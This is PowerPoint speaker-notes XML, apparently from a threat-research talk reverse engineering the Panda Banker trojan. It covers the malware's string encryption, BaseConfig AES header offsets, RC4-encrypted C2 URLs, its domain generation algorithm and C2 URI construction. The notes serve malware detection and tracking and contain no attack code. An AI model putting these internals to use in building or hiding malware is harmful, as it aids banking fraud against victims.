        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="648996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in version 2.6.0 they replaced the Zeus-based string encryption algorithm entirely and starting using RC4 where each string was encrypted with a random DWORD as its key.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3991439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 flavor, here are the encrypted strings from a version 2.6.10 sample. There are about 240 of them.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2650041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Zeus world, the malware’s embedded static configuration data is known as its “BaseConfig”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How the BaseConfig is stored and encrypted is usually one of the major differentials between the various Zeus families. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, in generic Zeus, the BaseConfig is stored encrypted and is decrypted with a basic XOR.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="831130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ZeusVM variants, the BaseConfig is stored encrypted and a custom virtual machine is used to decrypt it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3789414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 Banker continues the BaseConfig traditions of Zeus. When it is used in the code it is generally referenced like this. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both input and output use a structure that contains a buffer and buffer length. The structure also has a “crypto operation” flag specifying whether the “crypto_ops” function should decrypt or encrypt the data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1502476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version 2.2.9 the encrypted BaseConfig contained an 80-byte header followed by AES encrypted data. The header contains the AES key and IV and also a SHA256 hash covering everything except for the hash itself.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1592909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in version 2.3.1, the header was increased to 336-bytes and the key and IV moved around. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The IV is now stored at offset 0x140 and the offset of the key can vary from sample to sample and is determined by a 1-byte key offset at offset 0x20.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4118138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where did the name “Panda” come from? Well, one way that malware get their name is when they are being reverse engineered, a particular string stands out in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Early versions of Panda Banker do indeed include the string “Panda”, it’s stored as one of its encrypted strings which I’ll cover in a few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it turns out that this "Panda" is a misnomer. In the code, it is used to identify the presence of the Panda Security Antivirus software on the infected system and not the malware itself.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2796033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offset 0x20 (in green at the top) contains the value 0xb6, the 32-byte AES key will be located at offset 0xd6 (in green towards the middle).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272061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decrypted, the BaseConfig is a binary structure that contains various items of interest mixed in with random values. The offsets of the various items aren’t static and do change from sample to sample.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first item of interest can be called the ”static botnet” and it is an identifier that can be chosen by the threat actor when building the malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this example, the botnet is “newtest” and was stored as a wide string at offset 0x251. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1902691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the time the static botnet is not set in the BaseConfig and when that happens it of course defaults to the name “not set”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But when a threat actor choses to set it, there’s quite a bit of variety.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1328074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seen 143 unique static botnets so far and sometimes they can be helpful when grouping together and organizing samples. These are the top 50 I've seen.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2838157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item of interest is a value used as a key in various other components of Panda Banker. I’ll show some uses of the key in a few slides.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The length of the key value is stored as a DWORD. In this example it is at offset 0x39b (in red) and the key length is 293-bytes. I actually believe the key value length will always be 293-bytes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this example, the key starts at offset 0x276 (in green) and I believe the key value is always an RSA public key formatted as a X.509 subjectPublicKeyInfo DER SEQUENCE structure.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1572692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value, or rather a hash of the key value, has proven very useful when trying to group together and organize samples. I’ve seen 67 unique key hashes so far and this graph shows the top 30.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3817126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item of interest from the BaseConfig that I want to point out are the command and control URLs. There can be multiple URLs and like the other components are placed at random offsets within the BaseConfig. Unlike the other components though, the URLs are further encrypted with RC4. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Despite being an RSA key, the BaseConfig key I discussed in the last few slides is used as the RC4 key for decryption here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>My technique for extracting C2s has been to iterate over the plaintext BaseConfig and bruteforce decrypt all possible chunks of data that are 101-bytes in size.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="494289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in version 2.6.0, they changed the URL decryption slightly. I guess one way to describe what they did is that they now prime the RC4 engine with 30 rounds of decrypting null DWORDs before decrypting the URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In version 2.6.2 they changed it from 30 rounds to 55 rounds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And in version 2.6.5 they changed it from 55 rounds to 22 rounds. They also changed from decrypting a null DWORD to decrypting just a null byte.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3064564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 wanted to show some example C2s and highlight the filename portion as these filenames are used in the command and control protocol later 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Initially these filenames had descriptive names, but they switched to random looking names pretty quickly and there’s not much overlap of them.</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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2953038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last BaseConfig item I want to discuss are these short URL looking things. They are stored NULL delimited and turn out to be components of a backup domain generation algorithm used by Panda Banker when the hardcoded C2s are dead. These endings can change from sample to sample and allow for the DGA to be used by multiple different groups.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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374126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place where malware get their name is from their command and control panels.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Panda Banker's command and control login page looked like and we can see "Panda" up in the title.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actually not very easy to find the login page for Panda Banker C2s....</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1605776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the DGA in action and where the BaseConfig components come into to play in this sandbox run.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1411443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2.2.1 was the first version that implemented the DGA. It is a date based DGA and back in October 2016 I wrote a blog post with the details and released some code that implemented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version 2.2.9, they made a slight modification that adjusted how often new domains are generated.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19682199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And in version 2.2.10 they made some additional changes. I’m not sure if those changes were ever talked about publicly, but here’s a short diff to my original code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="678429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be honest, I haven’t stayed up to date on the DGAs, so I currently don’t have any good details on how active they are or were… However, for this talk I did take a look at one recent sample’s DGA config and resolved its domains year-to-date.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DGA config was surprisingly active with 18 of the DGA domain names still resolving with the latest being from October 18th. At first I thought most of them would be sinkholes, but after some quick research it looks like most of them are actually malicious.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2564496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C2s use HTTPS. Underneath the TLS, a request to the C2 looks something like this…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As highlighted, we need to discuss the URI and the POST data components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3193603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the first few versions of Panda Banker, the URIs were generated using this algorithm.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general process is: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first part of the URI is a randomly generated XOR key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A bot ID is then created from various pieces of system information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That bot ID is XORed with the random key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
